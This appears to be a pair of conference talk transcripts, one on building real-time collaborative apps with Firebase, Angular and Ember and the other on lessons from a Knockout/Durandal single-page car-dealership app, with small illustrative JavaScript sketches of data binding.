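  prop.subscribe = fn => subscribers.push(fn);
  return prop;
}

// Usage: the "view" subscribes and is re-rendered whenever the model changes.
const name = observable('world');
const rendered = [];
name.subscribe(v => rendered.push('Hello ' + v));
name('NDC');
name('Oslo');
console.log(name());   // → 'Oslo'
console.log(rendered); // → ['Hello NDC', 'Hello Oslo']
```

The cost the speaker mentions is visible here: `name` is now a method, not a plain property, so data pulled from a server has to be converted into these wrappers.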
And the other way around is to watch your model for changes. And in that way, you can avoid having to wrap your objects, and thereby avoid that things go from being properties to being methods and that you have to do this whole conversion every time you pull data from the server, which, again, depending on what you're building, in some cases might actually be a bit of a nuisance. But, yeah, Angular does the latter, and frameworks like Ember, for instance, which we'll also be looking at, do more of a wrapping kind of thing. So, yeah, we ended up going with Angular after having looked at this space for quite a while. Basically, part of the reason for that choice was that it was really starting to take off. It was nice to have a platform that we knew was backed by a fairly big company, so we felt fairly safe that it wasn't going away. And even though a lot of people said at the time that we didn't really have any winners yet with regards to which platform people were going to choose for doing single-page applications, we were starting to see a trend, as you can see on that slide. And actually, later on, I've become even more confident that a lot of good stuff will still happen with Angular, as Rob Eisenberg lately joined the team to implement some of his good ideas from Durandal into Angular as well. So, yeah, I still think it's a good platform if you want to use a framework, and I'm just for now keeping out of the whole discussion of whether you want a framework or not. But in that case, it is a good way to go. And, yeah, how many of you have worked with AngularJS? Okay, fair amount of you. So, basically, this is just to get everybody on board, and this is pretty much the simplest thing that you can do in Angular. And as you can see, this just has a placeholder where I can put a name in my template, which is marked with having this controller, which defines a certain scope that we are working within, that our model will be contained within.
And then, you'll have to declare that controller in code as well. The simplest way of doing that is just having a function that is named accordingly. And then, through dependency injection, you can kind of acquire different things that you want to use from the Angular framework. With the basic thing you'll pretty much always be needing being a scope, which is where all your, well, functions and all of your model will be bound to. So, in this case, I just set the name that I was displaying in the template to my name. And then, I add a function that allows me to show what is in that, and then add that through what is called a directive, which is ngClick, which wires all that up. So, I'll be able to call that function when pressing a button. And getting in a little bit deeper with this, the way that this works in AngularJS, and the reason that it's actually so simple to work with and that you don't have to do anything yourself out of the box, is that they have this $watch, $apply, $digest cycle. And, yeah, basically, you can also access this yourselves. And the idea is that you watch some part of the model, some property. And you can either do that by specifying the name of the property or by a function which just returns that value from the scope, and then passing in a handler for what you want done afterwards. And then, you can apply changes to a model in kind of the opposite way, if you would call it that, in that you can also pass it this kind of expression or you can pass it a function that you want to apply. And this all allows Angular to keep track of what changes are made to the model and then do its magic behind the scenes. And it does this through what is called a digest cycle. So, basically you can call this digest method yourselves, but I pretty much just took it in here for completeness' sake because, as with garbage collection in .NET or things like that, it's not normally something you would call yourself. It just goes on behind the scenes.
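The watch/apply/digest mechanics described above boil down to dirty checking, which can be sketched framework-free. This is a heavy simplification of what Angular actually does (real Angular repeats the loop until the model stabilizes, evaluates expressions, and much more), but it shows the core idea:

```javascript
// A bare-bones sketch of the dirty-checking idea behind the $watch/$digest
// cycle described above. Heavily simplified, for illustration only.
function createScope() {
  const watchers = [];
  return {
    model: {},
    // "watch": remember how to read a value and what to do when it changes.
    watch(getter, listener) {
      watchers.push({ getter, listener, last: undefined });
    },
    // "digest": check every watched value and fire listeners on change.
    digest() {
      watchers.forEach(w => {
        const current = w.getter(this.model);
        if (current !== w.last) {
          w.listener(current, w.last);
          w.last = current;
        }
      });
    },
    // "apply": change the model, then kick off a digest.
    apply(fn) {
      fn(this.model);
      this.digest();
    }
  };
}

const scope = createScope();
const log = [];
scope.watch(m => m.yourName, v => log.push('name is now ' + v));
scope.apply(m => { m.yourName = 'Christian'; });
scope.apply(m => { m.yourName = 'Christian'; }); // unchanged -> no new event
scope.apply(m => { m.yourName = 'NDC'; });
console.log(log); // → ['name is now Christian', 'name is now NDC']
```

Notice that the model stays a plain object — nothing is wrapped — which is exactly the trade-off against the property-wrapping approach shown earlier.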
And then, building on that, once we had that kind of knowledge built up in-house, we were starting to look at AngularFire, because we wanted to use Firebase, and even though it's already fairly simple to work with, we might as well look at these kinds of plugins that make it really, really trivial. The basic idea is that you go from having this two-way binding to actually having three-way binding. So, now you can bind from your view to your model that you're working with to a database. And essentially, what that gives you is a real-time application, right? Because if I make a change in my browser and that is propagated to the database, and the database makes sure that it's propagated to all the clients, then we're done. Then we can all be working on the same model in real time and collaborating. And it's, yeah, to me it was just, you know, astounding how simple this really is: we're all used to working with two-way binding, and you pretty much just add the concept of binding this model to a database, and now we have brand new capabilities that we weren't able to work with before, really. Once you get started with AngularFire, they also have pretty good documentation by now and also some really good examples. Again, getting up and running with this is a matter of minutes, so I really encourage you to try it out yourselves and just give it a go. But I also want us to try it out right now if you guys are up for it. So, yeah, just a short run-through of the code. This is a little deeper than the Angular stuff we did before, because in this case, I first off declare a module, then I import this Firebase module as well that I need to use, then I set up my controller much like I did before. This is just the proper way of doing things, because if you just write a function, then when it gets minified, the variable names change and then your dependency injection goes out the window. So, this is basically what you do working with Angular.
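The three-way binding idea described above (view ↔ model ↔ database) can be sketched with a shared store that every bound client model subscribes to. All names here are invented for the sketch — this is the concept, not AngularFire's actual code:

```javascript
// Sketch of the three-way binding idea described above: a shared "database"
// that several client-side models bind to, so a change made by one client is
// propagated to all of them. Just the concept -- not AngularFire's real code.
function createSharedStore() {
  const bindings = [];
  let state = [];
  return {
    // bind() gives a client a local model that stays in sync with the store.
    bind() {
      const local = { items: [...state] };
      bindings.push(local);
      return {
        model: local,
        // A local change goes to the store, which fans it out to every client.
        add(item) {
          state = [...state, item];
          bindings.forEach(b => { b.items = [...state]; });
        }
      };
    }
  };
}

// Two "browsers" bound to the same store: one sends a message, both see it.
const sharedStore = createSharedStore();
const clientA = sharedStore.bind();
const clientB = sharedStore.bind();
clientA.add({ from: 'A', text: 'hello' });
console.log(clientB.model.items.length); // → 1
```

In the real setup, the framework's two-way binding covers the view↔model leg and the Firebase plugin covers the model↔database leg, which is why so little wire-up code is needed.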
And then you can get your scope injected as before, but you can also get this Firebase service. And once you have that, you can create your Firebase reference, and then you can write a function that just adds a method for, yeah, for adding messages in this case. So, again, really, really simple, and especially for you who have been working with Angular, this is pretty much what you're already doing, with just a line or two of wire-up, and then you get a real-time application. So, if you guys feel like it, I would like you to try out the application that you just saw. I just put it on that URL. So, you guys should be able to see what you are writing. And...whoa. Whoops. And here you actually see the Firebase database and you see your messages rolling in as things change. If you notice, when they roll in, they light up so you can see which things are, yeah, being added, and if things were being deleted and so on. So, you can kind of see what's going on with the database at all times. And this view is just an implementation like the one you saw before, just displaying the raw data. So, again, a really simple way of using this whole conceptual model of working with real-time data. And, yeah, for those of you not holding a phone, this is what it looks like. So, this is where we came from. And even though, as I mentioned before, I didn't end up going with Ember, I still thought it was a significant point to show you guys that this works equally well with Ember. So, you shouldn't, you know, kind of let yourself be deterred if you have a different framework that you like. Actually, I recently saw that they are doing stuff with React as well, which is also looking to become really nice and really easy to work with. Yeah. Even though not being too knowledgeable about Ember myself, I'll just give a short introduction to the concepts that we need in this case. First of all, templating is done using Handlebars.
So, where Angular is trying to be very much self-contained, Ember has a philosophy of using existing frameworks, which mostly means using Handlebars and jQuery. And then the more essential thing, and one of the core concepts of Ember, is working with routing. That is basically how you structure your application when you're starting out. So, as you see here, first of all, you create an application and then you can map to certain paths, and then you can set up a model that you're working with on that specific route. And the whole modeling part is quite extensible in Ember and kind of allows you to define your whole model, which types of properties you're working with and so on. And that is actually what is allowing it to collaborate with Firebase as well, in the way that we'll see. So, the Ember framework was introduced a little later than the one for Angular, but I think it is starting to get on par, especially because since then both of them have kind of been taken under the wing by Firebase themselves. So, they have references from their main site and they also made sure that the APIs are aligned more than they were at first. So, right now, if you've been working with one of them, it's actually fairly easy to get started with the other one as well. And I think it's really nice that they're kind of taking this entire view of the market of working with single-page applications and giving you different options. And yeah, as you see, the documentation looks pretty much like what you saw before, and they also have really nice examples to get you started if this is your speed. Basically, what you're doing in code is that you create this application, and then what you need to do to plug in Firebase is that you use this Firebase adapter, which is just a way in Ember to attach an adapter to your model so it can do more than just being an in-memory model. In this case, that makes sure it's wired up to Firebase.
And then for some of the more advanced stuff, when dealing with modeling, you'll need an application serializer as well, which is also just in the package. So, you'll just add that as well. And that is all that you need to do. So, again, this shows you how it works in its entirety. So you do the stuff that I just went over, as you see at the top. Then you declare your model. In this case, like before, I have a sender of the message, which is a from and a text. And then I define my route with this type of model. And then I declare a controller for it. And I implement the action that I need, which is, again, to be able to send a message. And then I just work with the Ember Data stuff as you normally would. And then, of course, make sure to save at the end. Actually, I made the same sample if you guys want to try it out at this URL. It should look pretty much like the one you saw before. But, as you can see here. Whoa. And, of course, these chat examples are pretty much just to give you an idea of how this works, because you could be doing something a lot more creative than a simple chat application. But really what I want to give you when you leave here is just the confidence to try this out and see how extremely simple it is to get started. And whether you're passing chat messages or whatever data structure, it really doesn't change much. It pretty much stays simple and easy to do. So just to do a bit of a comparison of the two frameworks, as you can see from this list, a lot of the differences really come down to the differences of the underlying single-page application framework. But, yeah, now both are officially supported. And the data models align pretty well after the late changes that they have made. And then it's a matter of whether you like working with a system that supports the watching or the wrapping version of working with two-way bindings. And then, of course, there's a matter of size and learning curve. Ember is quite a bit more extensive to get started with.
And I would argue that the learning curve is quite a bit steeper for most people coming into this. And then, of course, conceptually, they are different, because there's a difference between working with controllers and scopes right out of the gate versus working with routes and models, as you saw in the samples before. Yeah, and then there's the matter of being self-contained versus having dependencies on other frameworks, which in both cases has its ups and downs, right? And in the end, both will definitely get you where you need to go. It's just a matter of how you like to get there. And kind of in overview of all of this, of course, these types of services that backend-as-a-service providers give you will never be one-size-fits-all. So I'm not trying to advocate that no matter what you are building, you should be doing this, or that you should use it as your main store or anything along those lines. But there are quite a few awesome use cases that you probably weren't able to build just a few years ago. And at least if you were, then it would probably be hard to find somebody who would be willing to fund it, because it would be quite a bit of work to get running as smoothly as you can today. So yeah, use cases. I've kind of divided that into two overall groups, just to spur some ideas, and hopefully, and probably, you guys have better ideas than I do. So I'm just trying to jog your minds a little bit. But yeah, the obvious use case, as we already saw, was doing chatting and social media and stuff like that. But also when working with sharing data in everyday life, it would be useful to be able to work with grocery lists, anything where you're collaborating with either the missus at home or with colleagues or what it might be. Then it's obvious that you want to do this in real time and not have to update your application all the time to see if new changes rolled in if you're actually doing stuff at the same time.
Also for teaching tools; you see a lot of places where people to a higher extent try to get taught from home, or at least not on premise. Then there might be some awesome situations where you could use it for gaming, of course. And then, being a huge sports guy myself, I'm hoping that some of the betting companies will actually pick up on this as well, because they tend to have these platforms where you can live bet and you still end up having a page that is just refreshed and refreshed and refreshed. And this could be done a lot more elegantly with this type of tool. And then of course, focusing more on business-type applications, what I've been using it for actually has been working with actionable data, making sure that business decisions are available in real time on dashboards and stuff like that. That includes of course listening to analytics data and pushing that out using a system like this. And then, yeah, building graphs, dashboards, and again, collaboration tools. And of course, doing customer support has suddenly become quite easy, because you could do, well, something that would start out as a chat application but basically extend it with whatever data you need to provide for your customers to provide the best type of service. And again, it would be fairly straightforward to do. Then I have one last demo I want you guys to see, if this will cooperate. And I could use a little more space here. So, this is just a real quick sample that I put together, because the actual platform that I was working on, I'm not allowed to just go around and show people, especially because some of the data on there is actually mission critical for that company. So I just made a really simple example where I'm working with a model in the same way that you saw before. But in this case, it displays data of car sales, completely something I made up. So don't mind the numbers too much. And, yeah, when the page loads, you see data pop in, and then I could add some other car.
It could be a Panda, and some color I didn't use already. And then put in some values for this as well. And then once I click, things are updated in real time. And of course, if more browsers had been on, they would update as well. And you need a bigger screen. The element I just added is added here at the bottom. And even if I go in this direction and choose to remove it again, you'll see my data update instantly. And what this kind of also shows is that you'll still be able to work with one model and actually display the data in several kinds of ways. Of course, that is what they are already doing in the database. But in one of the things I've been working with, we were actually allowing people to, in one view of the page, have data in tables and work with that data and do updates, and if they had some ideas of certain trades they might make, then we could do some calculations and push those out, and people could actually be working on those projections and so on while sitting in different ends of the country and having a talk about this. And it all just flowed between them in this nice and smooth fashion. Yeah. And, of course, you should see the code for this as well. And as you saw earlier, this is still just expanding a little bit on the same concepts as before: we have a chart controller, then we have a repeater that looks at the cars which are in my model. And then I have something that can display a marker for the color that was picked on this thing. And then I have the two canvases that I can bind to. But, of course, the framework that I use to display the graphs isn't part of Angular or any of this. So it doesn't really know much about these bindings. And that's actually what I want to show you: how to kind of get around this. And this is just my two-way bound model for updating these values, as you saw me use before. And then what I do is that I make a service that knows how to get the data for these bars.
So it just does some conversion once I get it back from the database, because in this case, the data model won't fit completely into what I'm doing. So I just implement a small service that will convert these things. And the same thing for getting the pie data. And then the actual thing of interest in all of this is, again, the wire-up to Firebase. In this case, I use, as I explained just before, the watch method of reacting to changes being made on a model client side. And because the graph tool doesn't know about these updates, I need to watch the cars property, and when it changes, I update my charts. So that's basically all the wire-up that I need to do to plug something in that does not at all know about these concepts, about this way of working with data, which I still think is pretty nice, pretty awesome. And then, of course, a function to save it all. So the takeaways that I hope you guys have from this talk are, well, first of all, to look at the cloud as more than hardware for rent and really look into some of these use cases. This is just one of them, and one that I found interesting and that I've been using. But there are plenty of other platforms showing up that look interesting and give you some awesome capabilities without you having to do much work for it, actually. So, you know, I hope it shows kind of how some of the barriers of working with different languages have been lowered with using these types of platforms, because even though I showed the samples in JavaScript, anybody could have pushed data to the database using whichever API they felt like. So it also enables collaboration in that sense. Of course, I hope you learned a bit about Firebase and how real-time has become really easy, and got some sense of working with Angular and EmberJS. And I would be extremely happy if someone actually went home with a good business case.
So they would be using this for more than just chat. And that's it for me, unless you have any questions. Yeah? Does Firebase have any query capabilities or something like that? Just fetching data by the URL? No. That is pretty much the focus of the database. So, as I shortly demonstrated, you can limit your queries and, in that sense, do things. But it is in no way meant to be a data store as such. It is meant to be a way of allowing you to handle changes to data. And that is why, in most cases, I would still have my regular data store and then have this on the side for doing these things, because it still allows me to not have to deal with all the complexities of building a real-time application, wiring that up to a backend and handling all the edge cases and so on. What's the underlying technology sending the update to the browser? Is it polling, or how does it work? Oh, yeah. It uses WebSockets, and kind of in the same way as SignalR, it tries to use WebSockets, and if there aren't WebSockets in your browser, then it has fallbacks doing long polling and, yeah, the same things as you would see in SignalR. Good point; I should have mentioned that. I haven't been pushing the limits of it, to be honest. But, yeah, from what I've seen, it scales pretty well and there are some pretty big companies using this already. But I won't try and guess on any explicit limits. I wouldn't know. If you really have an extreme case, then, yeah, I think you should just try it out. And that's the awesome thing, you know, you can try pushing data to this and it'll just take you 15 minutes, half an hour, and then you see if it's actually sufficient, because, you know, at the end of the day, talking about performance is always complex because there's a lot of aspects. So, yeah, in the end, I would just give it a go and see if it tumbles over. Yeah? Yeah. Yeah.
The question was if you could have your own instance of Firebase installed and running in your own data center, and you can. What they initially offer is that you sign up for it and it's this backend-as-a-service deal. But you can contact them, and they do have an option where you can actually buy into installing it in your own data center, and they will help you do that. But I think that is pretty much a per-case thing, so they will talk to you about what it should cost in your specific case. They don't just have a package out of the box for it. But they have people doing that. Yeah? But it's not bound to the DOM in that sense. As you work with it and you manipulate stuff, of course, you'll be able to do the same things. If things change, then they are propagated. I think that's it. Thank you guys for coming, and remember that if you want a sticker, then I have a bunch up here.
The cloud is more than just AWS vs Azure, scalability and big data. In this talk we will take a look at how BaaS offerings like Firebase can make it a walk in the park to build real-time collaborative applications. We will cover the building blocks for doing this, as well as how it fits in nicely with frameworks like Angular and Ember. We will also talk about why this is valuable and hopefully leave you with enough knowledge to be inspired about possible use cases in your own business.
10.5446/50589 (DOI)
We're good? Excellent. Let me hit play here. Good afternoon. This is Real-World SPA, a knockout case study. This session really shouldn't have the word knockout in it anymore, because we're going to talk about a lot of things outside of knockout. So if you're coming in here expecting an introduction to knockout, that's not my focus here. What we're going to do is talk about a lot of lessons learned from the biggest single-page application that I've ever built. This is about eight months to a year's worth of work that we launched just a few months ago. A lot of the lessons learned will hopefully be useful for you too. What we're talking about here is really the foundation for my next course, just thinking about patterns, practices, and principles for single-page app development. My clicker will work better if I plug it in. Let's try that. All right. So I want to get to know you and make sure that I'm delivering what's most useful for everybody. How many people in here have already built a single-page app? Okay. So we've got about half the room that's built a single-page app. How many people have done significant work in JavaScript to build web applications? So quite a few more hands there. That's the vast majority of the room. Cool. How many know Ember right now? Very few. Okay. Gil's got it covered. How about Angular? A lot of hands there. Backbone? Okay. Just a few. How about knockout? Okay. So good. You weren't coming in here wanting an introduction anyway. You're already familiar with knockout. Great. Anyone worked with Durandal? Just a few hands. Okay. RequireJS? Okay. Probably few enough. We may talk a little bit about that too. Anybody ever heard of Ajax before? You don't even bother raising your hands. Yes. Okay. Good deal. So here are the things that we can focus on, and we're going to get through as much of this as we can. There is a sea of decisions in making a single-page application, and making those decisions is maybe the hardest part.
I spent weeks and weeks and did lots of reading, and ultimately maybe even made the wrong decision. We'll get to that in a minute. I want to demo the application that we built, and I want to show you the code so you can tell me that it's rubbish and why, and that'll be just fine. But we'll all get better along the way. I want to discuss the tech stack that we picked and the performance implications of that stack, and if you're interested I can also show you the stack and how it runs in older browsers like IE8, because it's interesting comparing that to Chrome. You can literally feel the difference of an older browser. It still works, but it does not feel as snappy. And then I want to close with two things. I want to close with talking about principles for writing single-page apps, a lot of lessons learned from building something this big. And then finally talking about whether building a SPA even makes sense, because there are places where it does and doesn't. So let's dive in. I want to talk first about the sea of decisions, because this is maybe the hardest part about it. Now I love jQuery, and how many people in here coded in jQuery? A whole lot of hands. There we go. Hello, room. Great. jQuery is really useful and has helped move us forward in a lot of ways. Thank you, John Resig, for making that happen. Now the problem with jQuery is it really is only solving a piece of the puzzle. Manipulating the DOM is really useful. Making Ajax calls easier is useful, but there's a lot more that we need to get done for single-page apps, and that's what these sorts of options try to solve for you. In this session today we're going to talk about knockout and Durandal, the one at the top here. But these are your other logical options, and these days more and more we're seeing Angular sneaking closer and closer to becoming just the de facto standard here. It's ridiculous how much momentum it has picked up recently.
Ultimately these are all great options, but I'll get into maybe some specific reasons that I feel like Angular is getting so much traction. The app that we're going to look at is built with these technologies at the top. Of course you have to pick a language, which is strange. You'd think by default it's JavaScript, but if you're somebody that's into C sharp or VB.NET, then maybe TypeScript sounds interesting. Or if you're a Ruby developer, then you probably like CoffeeScript. Or if you're someone I've never met, then you probably like Dart. Is anyone using Dart? It's silence. Yeah, I don't know. This is something that Google tried that just doesn't seem to be catching on. You have to choose how you're going to return all that JSON to your application. We went with just good old Web API. It's nice and simple. So we're writing C sharp on the server and just returning JSON over Web API. Node.js is another popular way to do this, and I could list on and on here. But this was another decision we had to make. We had to pick a promise library, because if you're using knockout and Durandal, that doesn't come out of the box. We could have used jQuery. I don't recommend using jQuery, because jQuery does not honor the promises spec, and because of that there's some weirdness in there. You're really better off choosing one of these other three. We went with Q and have been quite happy with it. If you want to do testing, you're going to need a framework for that too. And Gil did a talk about Jasmine. Did anybody go to Gil's talk on Jasmine? So quite a few hands. Okay, I figured that would be the case. I happened to choose QUnit. I've been pretty happy with it. From all that I've read, though, Jasmine is probably a better choice. QUnit, the advantages: the learning curve is really low. It was actually created by John Resig to test jQuery. Hence the name QUnit. But it's really easy to pick up and it's a good start.
You'll probably want some kind of a utility library to make JavaScript feel a little bit more like a big grown-up server-side language, and that's what these seek to do. If you're familiar with C sharp, you can do things that feel a bit like LINQ statements within the realm of these utility libraries. Hi, Steve. I just saw you over there and now I'm all excited. Sorry. Steve wrote knockout, am I right? Started the project. Okay, yeah. So smart guy over there. I just had to say hi. He made a lot of this possible. Data access: we've got another decision to make. Amplify, Breeze, these are two ways to do it. I didn't end up getting this sold to my manager, because if I were to describe Breeze to you right now, I would say Breeze is a way to basically expose your database over a RESTful API. Boy, that sounds convenient, and it doesn't sound very secure, does it? So I can't really figure out the benefit by the time you've done the work to secure all the edge cases that would come from effectively just making a RESTful API call to your database. I don't understand. Anybody in here worked with Breeze? Is my description accurate? No opinions. Okay, we'll move on. Network transport: another decision that you have to make. We're using plain old Ajax calls, because ultimately there's very little that we need to do that is truly real time. We didn't need server-side push in anything that I'm doing. But if you're going that route, then of course Ajax long polling is a really simple way to go, or just making a call every so often. Basically, down here at the bottom of the screen, these are options that abstract away all of this confusion. If you choose to use SignalR, then SignalR is ultimately using one of these things up here for you, and you don't know that it's doing it. You just trust it and it works, which is pretty cool. So a lot of ways that you don't have to deal with that complexity. Of course you need to persist your data somewhere.
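On the utility-library point from a moment ago: for simple cases, plain Array.prototype methods already give you that LINQ-ish chaining feel, and libraries like Underscore and Lodash layer grouping, chaining wrappers, and more on top. A small sketch, where the data is made up for illustration:

```javascript
// Sample data, invented for the example.
const deals = [
  { vehicle: 'Focus', price: 18000, isNew: true },
  { vehicle: 'Milan', price: 9900, isNew: false },
  { vehicle: 'F-150', price: 32000, isNew: true },
];

// Roughly the shape of a LINQ query like:
//   deals.Where(d => d.IsNew).OrderBy(d => d.Price).Select(d => d.Vehicle)
const newVehicles = deals
  .filter(d => d.isNew)                 // Where
  .sort((a, b) => a.price - b.price)    // OrderBy (sorts the filtered copy)
  .map(d => d.vehicle);                 // Select

console.log(newVehicles); // [ 'Focus', 'F-150' ]
```

A utility library earns its keep once you need things the built-ins lack, like groupBy, debounce, or deep clones, but the chaining style is the same.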
We didn't do anything flashy. We went with SQL Server, and we have a pretty complex data model. We're doing a lot of joins. We're using caching so that it's not a big deal to pull all this back and spit it out in the right shape for our JSON. So that's been working out well. Then of course you need to do cross-browser testing. I'm going to look at BrowserStack and show you guys how we're doing cross-browser testing with it. BrowserStack is really cool, and it saved us a lot of time from dealing with virtual machines. If you aren't familiar with it, this Modern.IE link here, which I guess you'll have to download the slides to see. Modern.IE is a Microsoft initiative that has old versions of IE, virtual machines that you can download, and they'll work in a number of different VM platforms. All right, so that's the introduction. Let's get a little bit geekier and talk about an app demo. Here was the situation. I work in automotive software, and we had a Silverlight application that car salesmen were using, and it was getting a little long in the tooth for a number of reasons. For one thing, people are now wanting to be out at car dealerships with tablets, with iPhones, and be able to do their work, and Silverlight is a non-starter on those platforms. Now I don't know much about the automotive industry around here. Do you still have dealerships that hold inventory of cars? Is that an idea here? Okay, because I know that's not worldwide. The reason I ask that too is the big idea of our application is this. So here's Vinny, my friend, the car salesman. He's a nice guy, questionable taste in clothes, but otherwise, nice guy. When you sit down at Vinny's desk, you're going to talk about buying a car. Maybe you found this Ford Focus and it's just really exciting. When you sit down at his desk, that is called desking. That's salesman jargon, and what you're doing there is talking about the bottom line. How much are you going to pay for that car?
What payments will you make? What's your interest rate? What bank will you go through? How can I upsell you on a bunch of different options? Car salesman need a piece of software to make this happen. That piece of software is called desking and that's what I'm going to show you. We built a single-page application to help make Vinny be more successful. So I'm going to jump over here to the app itself and make sure I'm logged in. I'll jump back in here. One thing that you do see is the rest of this application is not a single-page app. What I'm showing you here is one of the few places in the entire application that is a spa. You're also going to notice that because of our Wi-Fi, it's going to be pretty painfully slow to load. I'll get into also some reasons why. This app has almost 100 JavaScript files, separate files that contain the logic to perform what's going on on the screen. It has about 95 different HTML files. Has a huge portion of CSS to make it all happen too. So let's do this. Imagine you're coming in and you're going to buy a new car and I'm going to name this deal. Maybe I'm trying to sell you a Ford Focus. I'll just name it that. That's fine. And you're considering purchasing it new. So that's the template. I'm not even going to add a vehicle, but I could go in and search inventory if I wanted to. So I'll go ahead and just create the deal. And you're going to see this all pop up. Now we designed this to fit on 1024-Wide. You can see it just squeezes in at the current res here. So now we're seeing a deal and you can see I'm trying to decide between doing a purchase, that's the P, and a lease here. So let's say for instance that I'm trying to decide on a down payment. Well, I tell you what, I'm going to add a car in. Well I'll do this instead. I'm going to pull up a previous deal so that you don't have to wait for me to do all this stuff. Just show you how it is all together. All right. 
So this person is thinking about buying a 2006 Mercury Milan right here. And there's the picture of it. We can see it has 65,000 miles and it's selling for $9,900. And they're considering a cash deal in this case, but most people these days end up purchasing a car and making payments on it. And they're considering maybe a $1,000 down payment or a $2,000 down payment or $3,000 down payment. Notice how as I'm typing these things in, it's making Ajax calls to the server and you're seeing payments calculate immediately. Maybe I can get him a 4.5% interest rate at 60 months. Now I'm going to tab out. And again, you just see little toast pop up on the right hand side of the screen that's showing things that have changed. And now we have down payments of $1,000, $2,000, or $3,000. And these are the monthly payments that someone would make based on that. Now imagine you're sitting there and we're having a conversation and you go, I can't afford $173 a month. And I go, OK, well that's fine. What can you afford? Let me click this roll button here. Well I could afford $125 a month. That I can do. So I'll go ahead and click roll. And what it's doing is making calculations and figuring out what numbers could I change to get you to that down payment because we want to pay $125 a month. Well I could lower the selling price. I could increase my down payment. I could get more for my trade in. Or I could pay for 88 months instead of for 60 months. Well, like most Americans, I just want to pay longer. So that's what I'm going to do. We're fine with going into debt, into perpetuity here. So I clicked that and now what happened was, note my payment right here. Now it's $124. So it changed the payment accordingly. It came down here and set the monthly term just like we'd like. Now I could go into a whole lot more that this thing does and I could open up all sorts of dialogues and open other things, lots of jargon, but I don't want to bore you with the application. 
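The payment math being demonstrated here is, at its core, the standard loan amortization formula. The app's real calculation runs server side and also layers in taxes and fees, so the numbers below are only a sketch of the idea, with made-up figures:

```javascript
// Standard amortization formula, not the app's actual server-side logic.
// monthly payment = P * r / (1 - (1 + r)^-n), where r is the monthly rate.
function monthlyPayment(principal, annualRatePct, months) {
  const r = annualRatePct / 100 / 12;       // monthly interest rate
  if (r === 0) return principal / months;   // zero-interest edge case
  return principal * r / (1 - Math.pow(1 + r, -months));
}

// The "roll" feature solved the other direction too. One of those solves,
// rolling the term: given a target payment, how many months do I need?
//   n = -log(1 - P*r/payment) / log(1 + r)
function termForPayment(principal, annualRatePct, payment) {
  const r = annualRatePct / 100 / 12;
  return Math.ceil(-Math.log(1 - principal * r / payment) / Math.log(1 + r));
}

// E.g. $9,900 car, $1,000 down, 4.5% for 60 months:
const pay = monthlyPayment(8900, 4.5, 60);
console.log(pay.toFixed(2));               // somewhere around 166 a month

// And if the buyer insists on a lower payment, stretch the term instead:
console.log(termForPayment(8900, 4.5, 125)); // more months, same car
```

Rolling the selling price, down payment, or trade-in value is the same kind of solve, just isolating a different variable in the formula.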
I want to show you this enough so that you can understand some of the things that we ran up against. The first takeaway that you have here is when I change one value here, if I change this to 5.9%, pay attention to the math on the left hand side of the screen in this gray box here. I'm going to tab out and you'll notice that the balance due will change. Well I'm sorry, no, that's not a good example. I'm going to change this, change my purchase price, $12,000. Now when I do, all this math down here changes. All the payments over here change. So at any given time, there are 10, 20, 30 different DOM elements that have to change when one thing changes. So this is when I had the epiphany that the old school model of using jQuery to manipulate DOM elements really falls apart. Because if you're using jQuery to say, okay, when that cell changes, change this cell, this cell, this cell, this cell, this cell, I can't do it, it falls apart. Imagine maintaining that thing because when I change that cell, these 14 things change. When I change this cell in a different way, these 22 other things change. So what you need to be able to declare is say, I want this value right here bound to a certain piece of data back in the JavaScript. And that's exactly what's going on here. If I scroll this down some, you can see that I'm using knockout. And it's just a data bind formatted text to payment. In this case, it's called matrix payment because this is called a payment matrix over here. So this data dash bind is just saying, go get the JavaScript variable called matrix payment and put it in here. And formatted text is a custom binding that I wrote that formats the text the way that we would like it for this application. I can go in and do other things like copy this scenario over. I could create a new deal and maybe put that in for a different car or for the same car. I could go in and edit the vehicle. I can search for deals. All sorts of things going on. 
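To make that declarative-binding idea concrete, here is a toy sketch of the concept. This is not Knockout's implementation (that would be ko.observable plus a custom binding handler); the matrixPayment name and currency formatter below just stand in for the app's real formattedText binding:

```javascript
// A toy version of the idea behind Knockout's observables: a value that
// notifies subscribers when it changes, so every bound "cell" updates
// itself instead of being pushed to by hand-written jQuery.
function observable(initial) {
  let value = initial;
  const subscribers = [];
  function accessor(newValue) {
    if (arguments.length === 0) return value;   // called with no args: read
    value = newValue;                            // called with a value: write...
    subscribers.forEach(fn => fn(value));        // ...and notify everyone bound
  }
  accessor.subscribe = fn => subscribers.push(fn);
  return accessor;
}

// Hypothetical stand-in for the custom "formattedText" binding's formatter.
const formatCurrency = n => '$' + n.toFixed(2);

const matrixPayment = observable(173);
let cellText = formatCurrency(matrixPayment());           // initial render
matrixPayment.subscribe(v => { cellText = formatCurrency(v); }); // the binding

matrixPayment(124);      // one write in the view model...
console.log(cellText);   // "$124.00": the "DOM cell" updated itself
```

The payoff is that when thirty cells depend on one value, each cell declares its own dependency once, instead of the change handler having to know about all thirty.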
And again, I don't really want to focus too much on the app, but I want to show you enough that we can use it for a bit of conversation later. Does anybody want to look at code? Okay. Well, good. I was hoping I'd get a yes there. Otherwise, I was going to have a hole in my schedule. Yeah. All right. So let's talk about code. This is the folder structure. Is that big enough that you guys can see it on the TVs over there? Cool. This is the folder structure for it. I have left out the rest of the big huge app. This is just the single-page app that we've built. The way I have this structured is we have custom bindings in a folder. Keep our CSS there. Our images, it's all self-explanatory. These are all the JavaScript libraries that we're using. As you can see, jQuery; we're using Kendo for a little bit of our UI; of course, knockout. We're using a few different knockout plugins, and in particular Knockout Mapping, which has been really helpful. I'll get to that. Of course, Q. And then Toastr. Toastr is a project by John Papa that is doing those nice little green confirmations that pop up in the corner and then fade out. That's a handy little add-in. That said, I could have used Durandal for that too, but I liked how Toastr did it. And then our services. You could think about the services section as really where all our Ajax calls sit. They're in one folder called services. So anytime I'm going to make a call to the server so that I can ultimately hit the database, make changes, get back the JSON, it's going to happen through JavaScript within this folder. You can see that we've broken it down. I say that, but there are a few things in here that aren't dealing directly with any kind of Ajax-call-type work. Like cookies is just a service that I wrote that abstracts away the browser cookies and gives us a little cleaner API to work with. And then local storage, the same thing.
